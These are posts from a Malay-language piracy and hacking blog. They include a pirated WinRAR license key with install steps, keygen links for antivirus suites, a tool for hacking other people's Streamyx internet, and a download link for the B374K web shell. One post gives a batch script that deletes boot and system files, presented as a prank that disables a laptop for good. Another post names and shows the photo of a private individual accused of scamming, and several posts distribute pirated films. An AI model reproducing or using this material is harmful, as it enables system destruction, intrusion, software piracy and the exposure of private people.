Cara Buat WinRar Full Version Tanpa Menggunakan Keygen Dan Patch



Assalamualaikum dan Salam Sejahtera buat pembaca Blog.Penjenayah Cyber. Agak-agak, dah lama BL4CK tak posted dekat sini. Maklumlah, aku ini kan masih belajar. Exam dengan Homework banyak. Online pun jarang-jarang. Jadi, sekarang nie aku nak ajar korang semua macam mana nak buat WinRar yang Trial akan jadi Full Version tanpa memerlukan keygen dan patch.

Cara ini, ia juga dianggap seperti cara manual. Ok, benda yang anda perlu ada ialah:

1) Notepad
2) Kod untuk membuat WinRar jadi Full Version

Jom kita mulakan pada pemprosesan untuk Full-kan WinRar tuh.

1) Bukak Notepad ( Start > Run > Taip " notepad " > Tekan Enter )
2) Pastekan kod dibawah ini kedalam Notepad:


RAR registration data
GoDesain
Unlimited Company License
UID=85809e6a0fde94d8fa95
6412212250fa95dc80957d3b78af9245c62d98787c33099debe20a
4d39faf3beaeaf7ba62060fce6cb5ffde62890079861be57638717
7131ced835ed65cc743d9777f2ea71a8e32c7e593cf66794343565
b41bcf56929486b8bcdac33d50ecf77399600ffeefe7a2041d7fe7
9f06594bd79c285c2c19d7d9a786d95f8a05e6141248ddb9d9830f
6977c3aab5c4e4e651e4813323e9eb20ac3fd8b7173262fc601959
515d0a89683aae2654bfd31328af3e331535ea2d85dc1402723610


3) Pergi dekat File, pilih Save As ( rarreg.key ). Jangan sesekali ubah nama kepada yang lain.
4) Dekat Save as type gantikan dengan " All file ".
5) Lepas dah siap, korang Save.
6) Copy file nie dekat Folder WinRar ( C:\Program Files\WinRAR ).
7) Lastly, korang cuba buka WinRar tu balik.

Siap! Senang aja kan? Ok, BL4CK nak mintak tolong sangat-sangat, kalau dah copy segala Tutorial dan Tips & Triks di blog.Penjenayah Cyber nie, tolong lah Credit for this blog okeyh. Jangan jadi orang yang suka pentingkan diri sendiri ataupun " Selfish ". Kepada yang sudi Share tutorial disini, dan creditkan untuk blog ini, aku berterima kasih sangat-sangat.

Sekian dari BL4CK PIR4T3..





Antivirus Norton Internet Security 2012





Assalamualaikum dan Salam Sejahtera. Ok. Hari ini, mungkin BL4CK hanya berkongsi tentang Antivirus. Norton ini juga ialah sejenis software yang sangat bagus dan berguna. Ia memang ramai digunakan oleh semua orang. Tapi BL4CK memang jarang guna yang ini. Ok. BL4CK tak nak buang masa, so jom download Antivirus ini:-

Antivirus Norton Internet Security 2012 : Download
Keygen : Download

Jadi, BL4CK harap korang enjoy dengan Antivirus ini. Assalamualaikum.

Antivirus Bitdefender Internet Security 2012






Assalamualaikum dan Salam Sejahtera kepada semua pembaca. Hari ini, aku akan kongsikan dengan semua yang sedang mencari Antivirus, ini dia Antivirus Bitdefender Internet Security 2012. Kepada semua yang masih tidak tahu, antivirus yang ada didunia ini semuanya bagus-bagus tetapi jenis menggunakannya mempunyai fungsi yang berlainan. BL4CK tak kata, antivirus ini adalah yang terbaik dan terbagus di dunia, tetapi fungsi dia amat bersesuaian lah kepada yang masih mencari antivirus.

Antivirus ini, dia akan menjaga security internet anda sewaktu anda masih melayari internet. Antara fungsinya anda boleh lihat dibawah:-

# Firewall dan kawalan ke atas sambungan internet.
# Autopilot yang dapat mengawal popup tanpa kebenaran sobat.
# Menapis tautan yang ada di Facebook dan Twitter.
# Menyekat Virus, Spyware dan Spam.
# Menghindari Pencurian ID.
Scan yang supercepat. 
# Dan masih banyak Lagi...

Ok. Korang boleh download Keygennya DISINI.
Dan link download Antivirus Bitdefender Internet Security 2012 tuh DISINI

Ok. Sekian sahaja posted aku hari ini. Assalamualaikum.

( Kalau ada link yang aku bagi dekat atas tu tak work, sila komen dibawah ya)

Cara Sembunyikan Folder Di HandPhone



Assalamualaikum dan Salam Sejahtera. Hari ini, BL4CK nak kongsikan dengan korang semua, macam mana nak kunci Folder di HandPhone. Tapi, BL4CK cuma tak jumpa jalan penyelesaian untuk wujudkan balik Folder tu aje. Tapi, mungkin korang boleh wujudkan balik Folder tu dengan masukkan Memory Card korang ke USB dan buka Folder tu di Komputer korang. Ok, Tanpa membuang waktu yang sangat berharga ni, jom kita teruskan kepada pembelajaran kita tu.

# Masuk ke Memory Card HandPhone korang tu.
# Pilih Folder yang nak disembunyikan di Memory Card tu.
# Rename nama atau Ubah nama Folder yang korang pilih tu dengan akhirannya tu ada .ota
# Contohnya : BL4CKFolder.ota

Ok. Mudah sahaja kan? Korang boleh cuba dekat telefon korang. Aku hanya cuba di telefon aku jenis Nokia dan berkesan! Kalau korang punya telefon lagi mahal dari aku kut (Cehhh), korang cubalah sama ada dia berkesan atau tak.

Sekian dulu Triks Dan Tips dari aku, BL4CK PIR4T3.
Assalamualaikum.



Windows XP Command List






Assalamualaikum dan Salam Sejahtera kepada semua yang sudi membaca blog Penjenayah Cyber ini. Rasa-rasanya, dah lama agaknya BL4CK tak posted dekat blog ni. Jadi, disebabkan BL4CK dah lama tak posted, BL4CK nak kongsikan semua Command List yang BL4CK jumpa. Tak silap aku, sebelum ni aku ada posted jugak pasal Command List ni. Tapi yang tu aku cuma kasi ringkas-ringkas je dan tak ceritakan apa fungsi Code tu. Jadi, korang janganlah kata aku ni posted benda yang sama je, bukan macam tu. Aku cuma nak bagi korang semua lebih faham dengan apa yang aku posted ni. Tanpa banyak membuang masa, jom kita teruskan kepada pembahagian Command List tu.

Run Commands:

# compmgmt.msc - Computer management
# devmgmt.msc - Device manager
# diskmgmt.msc - Disk management
# dfrg.msc - Disk defrag
# eventvwr.msc - Event viewer
# fsmgmt.msc - Shared folders
# gpedit.msc - Group policies
# lusrmgr.msc - Local users and groups
# perfmon.msc - Performance monitor
# rsop.msc - Resultant set of policies
# secpol.msc - Local security settings
# services.msc - Various Services
# msconfig - System Configuration Utility
# regedit - Registry Editor
# msinfo32 _ System Information
# sysedit _ System Edit
# win.ini _ windows loading information(also system.ini)
# winver _ Shows current version of windows
# mailto: _ Opens default email client
# command _ Opens command prompt

Run Commands Untuk Akses Ke Control Panel: 

* appwiz.cpl -Add/Remove Programs control 
* timedate.cpl -Date/Time Properties control
* desk.cpl -Display Properties control
* findfast.cpl -FindFast control
* inetcpl.cpl -Internet Properties control
* main.cpl keyboard -Keyboard Properties control
* main.cpl -Mouse Properties control
* mmsys.cpl -Multimedia Properties control
* netcpl.cpl -Network Properties control
* password.cpl -Password Properties control
* mmsys.cpl sounds -Sound Properties control
* sysdm.cpl -System Properties control

Command Prompt: 

* ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.
* APPEND Causes MS-DOS to look in other directories when editing a file or running a command.
* ARP Displays, adds, and removes arp information from network devices.
* ASSIGN Assign a drive letter to an alternate letter.
* ASSOC View the file associations.
* AT Schedule a time to execute commands or programs.
* ATMADM Lists connections and addresses seen by Windows ATM call manager.
* ATTRIB Display and change file attributes.
* BATCH Recovery console command that executes a series of commands in a file.
* BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini * BREAK Enable / disable CTRL + C feature.
* CACLS View and modify file ACL's.
* CALL Calls a batch file from another batch file.
* CD Changes directories.
* CHCP Supplement the International keyboard and character set information.
* CHDIR Changes directories.
* CHKDSK Check the hard disk drive running FAT for errors.
* CHKNTFS Check the hard disk drive running NTFS for errors.
* CHOICE Specify a listing of multiple options within a batch file.
* CLS Clears the screen.
* CMD Opens the command interpreter.
* COLOR Easily change the foreground and background color of the MS-DOS window.
* COMP Compares files.
* COMPACT Compresses and uncompress files.
* CONTROL Open control panel icons from the MS-DOS prompt.
* CONVERT Convert FAT to NTFS.
* COPY Copy one or more files to an alternate location.
* CTTY Change the computers input/output devices.
* DATE View or change the systems date.
* DEBUG Debug utility to create assembly programs to modify hardware settings.
* DEFRAG Re-arrange the hard disk drive to help with loading programs.
* DEL Deletes one or more files.
* DELETE Recovery console command that deletes a file.
* DELTREE Deletes one or more files and/or directories.
* DIR List the contents of one or more directory.
* DISABLE Recovery console command that disables Windows system services or drivers.
* DISKCOMP Compare a disk with another disk.
* DISKCOPY Copy the contents of one disk and place them on another disk.
* DOSKEY Command to view and execute commands that have been run in the past.
* DOSSHELL A GUI to help with early MS-DOS users.
* DRIVPARM Enables overwrite of original device drivers.
* ECHO Displays messages and enables and disables echo.
* EDIT View and edit files.
* EDLIN View and edit files.
* EMM386 Load extended Memory Manager.
* ENABLE Recovery console command to enable a disable service or driver.
* ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.
* ERASE Erase files from computer.
* EXIT Exit from the command interpreter.
* EXPAND Expand a Microsoft Windows file back to it's original format.
* EXTRACT Extract files from the Microsoft Windows cabinets.
* FASTHELP Displays a listing of MS-DOS commands and information about them.
* FC Compare files.
* FDISK Utility used to create partitions on the hard disk drive.
* FIND Search for text within a file.
* FINDSTR Searches for a string of text within a file.
* FIXBOOT Writes a new boot sector.
* FIXMBR Writes a new boot record to a disk drive.
* FOR Boolean used in batch files.
* FORMAT Command to erase and prepare a disk drive.
* FTP Command to connect and operate on a FTP server.
* FTYPE Displays or modifies file types used in file extension associations.
* GOTO Moves a batch file to a specific label or location.
* GRAFTABL Show extended characters in graphics mode.
* HELP Display a listing of commands and brief explanation.
* IF Allows for batch files to perform conditional processing.
* IFSHLP.SYS 32-bit file manager.
* IPCONFIG Network command to view network adapter settings and assigned values.
* KEYB Change layout of keyboard.
* LABEL Change the label of a disk drive.
* LH Load a device driver in to high memory.
* LISTSVC Recovery console command that displays the services and drivers.
* LOADFIX Load a program above the first 64k.
* LOADHIGH Load a device driver in to high memory.
* LOCK Lock the hard disk drive.
* LOGON Recovery console command to list installations and enable administrator login.
* MAP Displays the device name of a drive.
* MD Command to create a new directory.
* MEM Display memory on system.
* MKDIR Command to create a new directory.
* MODE Modify the port or display settings.
* MORE Display one page at a time.
* MOVE Move one or more files from one directory to another directory.
* MSAV Early Microsoft Virus scanner.
* MSD Diagnostics utility.
* MSCDEX Utility used to load and provide access to the CD-ROM.
* NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT.
* NET Update, fix, or view the network or network settings.
* NETSH Configure dynamic and static network information from MS-DOS.
* NETSTAT Display the TCP/IP network protocol statistics and information.
* NLSFUNC Load country specific information.
* NSLOOKUP Look up an IP address of a domain or host on a network.
* PATH View and modify the computers path location.
* PATHPING View and locate locations of network latency.
* PAUSE Command used in batch files to stop the processing of a command.
* PING Test / send information to another network computer or network device.
* POPD Changes to the directory or network path stored by the pushd command.
* POWER Conserve power with computer portables.
* PRINT Prints data to a printer port.
* PROMPT View and change the MS-DOS prompt.
* PUSHD Stores a directory or network path in memory so it can be returned to at any time.
* QBASIC Open the QBasic.
* RD Removes an empty directory.
* REN Renames a file or directory.
* RENAME Renames a file or directory.
* RMDIR Removes an empty directory.
* ROUTE View and configure windows network route tables.
* RUNAS Enables a user to execute a program on another computer.
* SCANDISK Run the scandisk utility.
* SCANREG Scan registry and recover registry from errors.
* SET Change one variable or string to another.
* SETLOCAL Enables local environments to be changed without affecting anything else.
* SETVER Change MS-DOS version to trick older MS-DOS programs.
* SHARE Installs support for file sharing and locking capabilities.
* SHIFT Changes the position of replaceable parameters in a batch program.
* SHUTDOWN Shutdown the computer from the MS-DOS prompt.
* SMARTDRV Create a disk cache in conventional memory or extended memory.
* SORT Sorts the input and displays the output to the screen.
* START Start a separate window in Windows from the MS-DOS prompt.
* SUBST Substitute a folder on your computer for another drive letter.
* SWITCHES Remove add functions from MS-DOS.
* SYS Transfer system files to disk drive.
* TELNET Telnet to another computer / device from the prompt.
* TIME View or modify the system time.
* TITLE Change the title of their MS-DOS window.
* TRACERT Visually view a network packets route across a network.
* TREE View a visual tree of the hard disk drive.
* TYPE Display the contents of a file.
* UNDELETE Undelete a file that has been deleted.
* UNFORMAT Unformat a hard disk drive.
* UNLOCK Unlock a disk drive.
* VER Display the version information.
* VERIFY Enables or disables the feature to determine if files have been written properly.
* VOL Displays the volume information about the designated drive.
* XCOPY Copy multiple files, directories, and/or drives from one location to another.
* TRUENAME When placed before a file, will display the whole directory in which it exists
* TASKKILL It allows you to kill those unneeded or locked up applications. Kop.

Ok semua. Ini adalah senarainya. Semua kod-kodnya disediakan sekali dengan fungsinya. Jadi, BL4CK harap sangat-sangat yang korang akan kata benda yang BL4CK posted nie "SANGAT BERGUNA". Ia memang betul. Sangat berguna untuk korang. Semoga bermanfaat untuk korang ya!
Assalamualaikum.

How to hack streamyx How to hack streamyx


streamyx_logo
CREDIT TO - blog-ayie
Assalamualaikum dan selamat sejahtera kepada semua rakan-rakan yang dihormati sekalian. Hari ini setelah sekian lama saya tidak mahu berkongsi perisian yang telah saya gunakan untuk hack streamyx orang lain, maka dengan ini, saya ingin berkongsi dengan anda semua. Mengapa ? Bila saya lihat di email saya, semakin ramai yang meminta untuk ajarkan cara hack streamyx orang lain.
Untuk tutorial kali ini, apa yang perlu anda ketahui adalah lihat video yang akan saya letakkan disini.
Kemudian, anda perlulah lihat entri saya ini http://blog-ayie.com/2011/08/11/network-connections-in-windows-xp/
Untuk mendapatkan perisian yang akan digunakan ini, anda perlulah memuat turun perisian ini
Password = blog-ayie.com
Di harapkan dengan adanya video serta tutorial dan juga perisian yang ada ini, anda dapatlah menjadikan talian internet streamyx anda itu laju dan puas ikut kelajuan yang anda impikan.
f4nz dh try mmg laju smpai skrg jadi gayat...terima kasih syn Dycate...hahaha

B374K Shell V.3 2012

Assalamualaikum kepada semua pembaca Penjenayah Cyber. Hari nie, BL4CK nak kongsikan Shell
baru yang milik Newbie3vilc063s. Shell V.2 rasanya BL4CK dah posted Kut. Ok, BL4CK tahu korang semua mesti nak tengok Screenshot Shell B374K V.3 ini kan ? Korang boleh tengok Screenshotnya kat bawah :-




Ok. Korang boleh downloadnya di Sini

Credit To : RubikzKey TD

Selamat Hari Bapa



Assalamualaikum kepada semua pembaca Blog.Penjenayah Cyber ini. Hari ini, semua tahu bahawa hari ini adalah Hari Bapa bagi semua insan yang telah bergelar bapa. Tidak kira dimana, semua orang telah menyambut hari istimewa ini. Kita juga tahu, jasa Ibu dan Bapa sangat besar dan tiada nilainya terutamanya ialah Bapa. Bapa ialah seorang ketua keluarga dan ia perlu memastikan seluruh keluarganya baik dan sentiasa sihat.

Pengorbanan beliau haruslah dibalas dengan cara sebegini. Dan hari-hari juga ialah Hari Bapa. Bagi yang sudah kehilangan orang tuanya, jangan lupa untuk sedekahkan Al-Fatihah supaya beliau tenang disana. Pesanan terakhir daripada pihak Penjenayah Cyber, Selamat Menyambut Hari Bapa kepada seluruh rakyat Malaysia!








Cip mikro komputer boleh digodam

Gambar hiasan ( Klik untuk besarkan )

Dua penyelidik keselamatan United Kingdom telah menyiarkan satu dokumen mengenai kewujudan 'pintu belakang' pada cip mikro komputer yang membolehkan seseorang pengatur cara menukar atau memantau maklumat dalam cip tersebut.

Penyelidik, Sergei Skorobogatov dari Universiti Cambridge dan Christopher Wood dari Quo Vadis Labs merumuskan bahawa kelemahan tersebut mungkin bertujuan untuk mengubah kandungan terhadap memori yang sepatutnya selamat dan mendapatkan maklumat berkaitan faktor logik dalam cip.

"Saya telah membincangkan tentang kemungkinan terdapat kelemahan pada perkakasan komputer dalam artikel Scientific American pada Ogos 2010," ujar Skorobogatov.

Pelanggaran keselamatan merupakan satu kebimbangan yang serius disebabkan jenis cip yang terlibat. Cip yang terjejas, Pro ASIC3 A3P250 termasuk dalam kumpulan cip logik yang boleh diprogramkan atau dikenali sebagai Field Programmable Gate Array ( FFGA ).

Cip ini diguna pakai dalam pelbagai aplikasi besar seperti sistem komunikasi dan rangkaian, pasaran kewangan, sistem kawalan industri dan satu senarai panjang dalam sistem ketenteraan.


Identiti LoginDenied TD Terbongkar



Assalamualaikum....
Dari BL4CK PIR4T3...
Korang penah dengar tak nama LoginDenied TD nie ?
Mesti pernah kan ?
Sebab dia nie hebat dengan Deface dan Hack laman web...
Tapi, tanpa korang sangka-sangka, dia nie sebenarnya Scammer..

Dia pernah menipu beberapa rakan siber di Facebook..
Bagi semua orang yang pernah tengok gambar DP Facebook LoginDenied TD, itu
adalah gambar DP palsu !

Kalau korang nak tahu, tuan punya gambar DP tuh sebenarnya dia
rembat dari Facebook..
Facebook Tuan Punya DP:- Danish Ramos 

Then, korang mesti rasa geram gak kan ?
So, korang nak tahu siapa LoginDenied sebenarnya ?
Orang yang menyamar sebagai Danish Ramos:- Muhammad Amirul Ar Rasyid

Gambar DP Muhammad Amirul Ar Rasyid



Klik untuk besarkan

Ok.. Korang dah nampak kan ?
So, korang jaga-jaga lah dengan dia...

Assalamualaikum...



Wrath of the Titans (2012) DVDrip Mkv-Dlema80 Wrath of the Titans (2012) DVDrip Mkv-Dlema80 Wrath of the Titans (2012) DVDrip Mkv-Dlema80



Assalamualaikum.... Dari F4nZ ary nih admin nk share citer Warth of The Titans....Citer nih bess dan x rugi  downlaod lame2....baca Sinopsis di bawah :

http://www.imdb.com/title/tt1646987/ | Release Date: 30 March 2012 (USA) | Country: USA | Language: English | Genres: Action | Adventure | Fantasy | Subtitle; CLICK HERE| Size: 350MB | Source: DVDRip.XviD-DEPRiVED
Plot:
A decade after his heroic defeat of the monstrous Kraken, Perseus-the demigod son of Zeus-is attempting to live a quieter life as a village fisherman and the sole parent to his 10-year old son, Helius. Meanwhile, a struggle for supremacy rages between the gods and the Titans. Dangerously weakened by humanity’s lack of devotion, the gods are losing control of the imprisoned Titans and their ferocious leader, Kronos, father of the long-ruling brothers Zeus, Hades and Poseidon. The triumvirate had overthrown their powerful father long ago, leaving him to rot in the gloomy abyss of Tartarus, a dungeon that lies deep within the cavernous underworld. Perseus cannot ignore his true calling when Hades, along with Zeus’ godly son, Ares (Edgar Ramírez), switch loyalty and make a deal with Kronos to capture Zeus. The Titans’ strength grows stronger as Zeus’ remaining godly powers are siphoned…

Cara Buat Komik Meme Dengan Mudah

Assalamualaikum....
Dari BL4CK PIR4T3...
Ok, Sempena aku nak cukupkan Posted yang ke 100 bagi Labels Triks Dan Tips,
aku nak bagi korang buat komik yang selalu heboh kat Facebook nie...

Sebenarnya, cara buat komik Meme nie pown aku terbaca 1 Posted yang di-Posted oleh
Syakila Daniel
Blog dia :- http://syakila.com

Ok.. Korang tau tak macam mana komik Meme nieh ?
Korang boleh tengok contoh komik Meme yang aku dah buat nie..


Ok.. Korang nak buat tak ?
Aku tahu cerita yang aku buat tak menarik langsung...
Tapi, korang boleh mencuba buat cerita yang lebih menarik dari aku dekat laman web
kat bawah nie..

http://memebase.com/ragebuilder/

Ok, Semoga bermanfaat buat korang semua...
Assalamualaikum...

Cara Buat Email Yang Menarik



Assalamualaikum....
Dari BL4CK PIR4T3...
Korang pernah terasa tak nak buat email macam nie?

lanun_hitam@hackermail.com

Standard yang korang selalu guna mesti macam nie kan ?

lanun_hitam@yahoo.com

lanun_hitam@gmail.com

lanun_hitam@rocketmail.com

dan banyak lagi lah kan...

Ok.. Senang jerp...
Korang pergi Sign Up dekat Mail.com ...

Pastu, ada 1 tempat dia soh pilih jenis email macam mana yang korang nak..

Lastly, korang boleh ubah email tuh sebagai email Facebook korang...

Semoga bermanfaat...
Assalamualaikum...



Cara Lajukan Komputer



Assalamualaikum....
Dari BL4CK PIR4T3...
Hari ini aku akan ajar korang camne nak lajukan komputer korang
yang korang rasa agak lembab sikit kan..

ok..Ikut langkah bawah nie...

Start > Run > Taip " TEMP " > Tekan Enter > 1 Folder Akan Terbukak > CTRL + A atau
Select All > Delete All Files kat dalam Folder tuhh ...

Korang akan rasa kelainan sikit..
Ok.. Selamat Mencuba Guyz...

Assalamualaikum...

Cara Shutdown Komputer Buat Selama - Lamanya




Assalamualaikum....
Dari BL4CK PIR4T3...
Ok.. Korang kadang-kadang ada rasa menyampah tak
ngah laptop korang yang macam Blurr tuh..
So, berdendam dengan laptop tuhh ?
Hahaha...
Kalau korang nak Shutdown kan laptop nie selama-lamanya pun boleh..
Kalau nak kenakan kawan korang pun takpe...
Tapi dosa tanggung sendiri...
Ok ?

Ok.. Bukak Notepad...
Lepas dah bukak, Copy kod bawah nie...

@ Echo off attrib-r-s-h c: \ autoexec.bat 

 del c: \ autoexec.bat attrib-r-s-h c: \ boot.ini 

 del c: \ boot.ini attrib-r-s-h c: \ ntldr 

 del c: \ ntldr attrib-r-s-h c: \ windows \ win.ini 
del c: \ windows \ win.ini

Korang Save kan dengan nama " Shutdown.bat " ..
Kalau korang rasa bahaya, jangan klik ok ?
Hahah..
Nie just pembelajaran...

Semoga ilmu aku bagi nie bermanfaat untuk korang semua...
Assalamualaikum...


Cara Download Di 4Shared Tanpa Memerlukan Akaun




Assalamualaikum....
Dari BL4CK PIR4T3..
Hari nie, aku nak ajar korang, macam mana nak download
barang dekat 4Shared tanpa perlukan Akaun...
Kalau sebelum nie, admin F4NZ ada ajar macam mana nak skip masa download
di 4Shared..
Haa, yang nie lain sikit k..
Ok.. Jom mulakan..

Pergi ke 4Shared ..
Dan korang carilah benda apa yang korang nak download...
Dah jumpa, korang ambik link download tuhh...
Contoh macam yang nie..

http://www.4shared.com/mp3/2MME0HRh/Nazrey_Johani_-_Wahai_Kekasih_.htm
Ok. Copy link tuhh...
Then, korang pergi dekat 4Server nie..
Dan korang paste link download korang tadi dekat kotak tuh..
Lastly tekan Generate Link...
Korang boleh tengok gambar bawah nie..




Klik untuk besarkan

Haa, Secara automatik link download tuh keluar...
Dan korang boleh download !
Best kan Tutorial nie ?
Mintak korang Share lah yerk, tapi Credit To : Penjenayah Cyber..
Hehehe...

Sampai sini jerp ok tutorial aku hari nie..
Semoga bermanfaat...
Assalamualaikum..

Virus Flame Ditemui



Assalamualaikum....
Dari BL4CK PIR4T3...

Flame Malware - 21st Century Massive cyber attack on Iran

 Besar-besaran, sekeping canggih malware telah dijumpai baru menjangkiti sistem di Iran dan di tempat lain dan dipercayai untuk menjadi sebahagian yang diselaraskan dengan baik, berterusan, dikendalikan oleh kerajaan operasi pengintipan siber. 

 Virus Flame komputer bukan sahaja mencuri kuantiti yang banyak maklumat daripada pelbagai agensi kerajaan Iran, tetapi nampaknya walaupun terganggu eksport minyak dengan menutup terminal minyak, firma keselamatan maklumat Symantec Israel berkata semalam.Virus Flame baru-baru ini ditemui di Iran boleh digunakan untuk menjangkiti negara-negara lain, menurut Kesatuan Telekomunikasi Antarabangsa. 

 Sebagai agensi Pertubuhan Bangsa-Bangsa Bersatu yang dikenakan dengan membantu ahli melindungi rangkaian data mereka, ITU merancang untuk mengeluarkan amaran tentang bahaya Flame. 

 Komputer Negara Iran Pasukan Tindakan Kecemasan (Maher) berkata dalam satu kenyataan bahawa alat pengesanan dan pembersihan telah selesai pada awal bulan Mei dan kini bersedia untuk diedarkan kepada organisasi pada risiko infection. 

 Flame ditemui selepas Kesatuan Telekomunikasi Antarabangsa PBB meminta membantu dari firma-firma keselamatan untuk mengetahui apa yang telah mengelap data dari mesin seluruh siasatan East. 

 An Tengah menemui program canggih berniat jahat, yang sehingga itu, sebahagian besarnya mengelak pengesanan.Virus itu adalah kira-kira 20 kali ganda saiz Stuxnet, malware yang disasarkan kawalan kemudahan nuklear Iran. 



 
Kepekatan terbesar mesin yang dijangkiti di Iran, diikuti Tebing Barat Palestin dikawal, Sudan, Syria, Lubnan, Arab Saudi, dan Mesir. 

 Menurut laporan crysys pada sKyWIper (Nyalaan alias):sKyWIper mempunyai fungsi yang sangat maju untuk mencuri maklumat dan menyebarkan. Eksploitasi berganda dan kaedah perambatan boleh dengan bebas dikonfigurasikan oleh penyerang. Pengumpulan maklumat dari rangkaian besar komputer yang dijangkiti tidak pernah diukir dengan teliti kerana dalam sKyWIper. 

 Malware adalah yang paling mungkin mampu untuk menggunakan semua fungsi-fungsi komputer untuk matlamat. 

Ia meliputi semua kemungkinan utama untuk mengumpul risikan, termasuk papan kekunci, skrin, mikrofon, peranti penyimpanan, rangkaian, wifi, Bluetooth, USB dan proses sistem. 

 Api Swiss Knife Tentera malware dalam erti kata bahawa ia boleh memintas semua dibayangkan, tetapi ia tidak timbunan kod malware yang sedia ada yang dibuang bersama. 

 Ia amat bijak diukir. Seperti Stuxnet, ia mempunyai pelbagai pembiakan vektor - kekunci USB, perkongsian pencetak, dan hak-hak pengawal domain untuk menamakan beberapa. 

 Tiada vendor keselamatan telah menunjukkan sebuah negara yang tunggal atau kumpulan sebagai bertanggungjawab bagi perkara creation. The pusat Nyalaan dalam perdebatan pada masa ini ialah sama ada malware itu telah dibuat oleh kumpulan persendirian atau negara bangsa.

Credit To : Pegawai Penjara

Piranha 3DD (2012) HDRip 720p Mkv

http://www.imdb.com/title/tt1714203/ | Release Date: 11 May 2012 (Ireland) | Country: USA | Language: English | Genres: Comedy | Horror | Thriller | Subtitle: CLICK HERE | Size: 600MB | Source: 720p HDRiP AC3-5.1 x264-AXED
Plot:
Having awoken from their spring break extravaganza at Lake Victoria, the swarm heads upstream where they look to make a meal out of Big Wet, a local water park where when it comes to fun, nobody does it wetter! Though they came to get wet, get loaded and get some, the staff and patrons get more than they bargained for when they must face the fiercest, most bloodthirsty piranhas yet. Lead by the strong-willed, studious Maddy and her friends, Barry and Kyle, the trio must dive in and take on these man-eating creatures using every ounce of their being but can they be stopped?


Mirror Mirror 2012 720p BRRIP MKV

Mirror Mirror 2012 720p BRRIP MKV | 639 MB
INFO
iMDB: http://www.imdb.com/title/tt1667353/
Plot: An evil queen steals control of a kingdom and an exiled princess enlists the help of seven resourceful rebels to win back her birthright.
Genre:  Adventure | Comedy | Drama 
Language: English
Subtitle: Included 
Source: Mirror.Mirror.2012.720p.BRRip.x264.AAC-ViSiON 
Trailer: http://www.imdb.com/video/imdb/vi3708919321/
SCREENSHOT
DOWNLOAD
Search Subtitle: Subscene.Com
Mirror.Mirror.2012.720p.BluRay.x264-SYS: JF | FF | RS

Nongkrong (2012) [Malay] PPVRip Eng.Hardsub Mkv,Rmvb,Avi-Jie



Release Date: 10 May 2012 | Country: Malaysia | Language: Malay | Genres: Comedy,Horror | Subtitle: English Hardsub | Size: 350MB Mini Mkv,230MB Rmvb,700MB Avi | Quality: PPVRip – Jie Azz
Sinopsis: Mengisahkan tiga orang pemuda, Aman (Angah Raja Lawak), Bada (Shaheizy Sam) dan Cumi (Epy Raja Lawak) yang cuba mencari kekayaan dengan menggunakan jalan tidak sepatutnya iaitu meminta nombor ekor. Cumi yang terdesak ingin meminang kekasihnya, Lin (Nuremy Ramli) manakal Bada dan Aman yang mahu mengubah nasib keluarga tekad menemui bomoh bagi melaksanakan hasrat mereka.
Segala-galanya bermula apabila seorang bomoh handal menjalankan upacara memanggil Puteri Laut (Mon Ryanti) untuk membantu mereka. Puteri bersetuju dengan syarat, salah seorang dari mereka perlu berkahwin dengannya. Melihatkan kejelitaan Puteri, Bada tanpa bertangguh terus bersetuju. Usai sahaja upacara perkhawinan, Puteri bertukar rupa menjadi hantu yang menakutkan menyebabkan kesemua mereka terus lari lintang pukang. Bomoh pula telah dibunuh oleh hantu Puteri.
Hidup mereka berubah apabila hantu Puteri terus mengejar dan menghantu kehidupan mereka termasuklah menggangu Zura, isteri Aman yang sedang hamil dan Haryani, anak perempuan Bada yang masih kecil.
Pelbagai peristiwa yang ngeri campur lucu berlaku sehinggalah mereka mendapatkan bantuan daripada Azan iaitu abang kepada Aman. Azan yang bijak pandai, terus nampak dengan jelas apa yang diinginkan oleh hantu Puteri tersebut dan membuat keputusan untuk membantu mereka.
Dapatkan Azan menyelamatkan mereka ? Adakah akhirnya mereka akan sedar kesalahan sendiri dan berubah ? Semuanya akan terjawab dalam filem seram komedi terhebat ini, Nongkrong.

MKV FILE



RMVB FILE

PART1 PART2 


AVI FILE

PART1 PART2 PART3 PART4 

PART1 PART2 PART3 PART4 

Aku Ada Kau Ada? (2012) [Malay] PPVRip Eng.Hardsub Mkv,Rmvb,Avi-Jie

Release Date: 24 Mei 2012 | Country: Malaysia | Language: Malay | Genres: Comedy,Musical Romance | Subtitle: English Hardsub | Size: 350MB Mini Mkv,260MB Rmvb,700MB Avi | Quality: PPVRip – Jie Azz
Sinopsis: Nordin Ahmad (20) adalah pelajar tahun kedua yang teringin untuk dipandang “cool”. Masalahnya, setiap kali Nordin menjadi tumpuan, dia akan panik, mula batuk dan akhirnya muntah. Aziz pula, seorang pelajar poyo yang perasan popular, selalu menyakat Nordin. Aziz sangat sakit hati bila Nordin mendapat perhatian dari pelajar perempuan. Tina (20) adalah pelajar yang baru bertukar ke kolej Nordin untuk “99 Hari Senyum”, sebuah program khas untuk mengatasi sikap panas baran yang ditawarkan oleh Dr. Zida, kaunselor kolej. Tina tidak merasakan dia bermasalah walaupun dia sebenarnya adalah seorang panas baran tahap kronik. Namun bila mereka bertemu semula setelah 15 tahun berpisah, darah gemuruh Nordin makin teruk dan sakit marah Tina menjadi makin menjadi. Masalah menjadi lebih besar bila mereka disatukan dalam persembahan berkumpulan untuk kelas teater. Yang jelas, mereka saling membenci. Aziz suka Tina kerana dia melihat sendiri kebencian Tina pada Nordin. Makin lama mereka bertengkar, Tina tersedar yang dia sukakan Nordin, seperti 15 tahun dulu. Tina rasa dengan luahkan perasaan pada Nordin, dia akan dapat mengatasi sikap panas barannya tapi hanya jika Nordin menerima cintanya. Nordin pula kurang pasti jika dia betul-betul sukakan Tina jadi sebelum sempat Tina luahkan perasaannya pada Nordin, Nordin laksanakan “teknik istimewa”nya ke atas Tina. Melalui “teknik istimewa”nya, Nordin yakin dia sukakan Tina tapi malangnya, teknik Nordin itu buat Tina yakin Nordin bencikan dia. Tina buat keputusan keluar dari kumpulan. Namun Nordin sedar yang ianya masih tidak dapat menyelesaikan masalahnya selagi dia tidak berterus terang dengan Tina. Namum pada hari persembahan, kumpulan Nordin mengalami masalah bila apa yang dirancang tidak menjadi. Bila keadaan mula terdesak, Tina muncul dan buat persembahan bersama Nordin. Mereka pamerkan sebuah persembahan yang mantap.

MKV FILE

PART1 PART2 


RMVB FILE
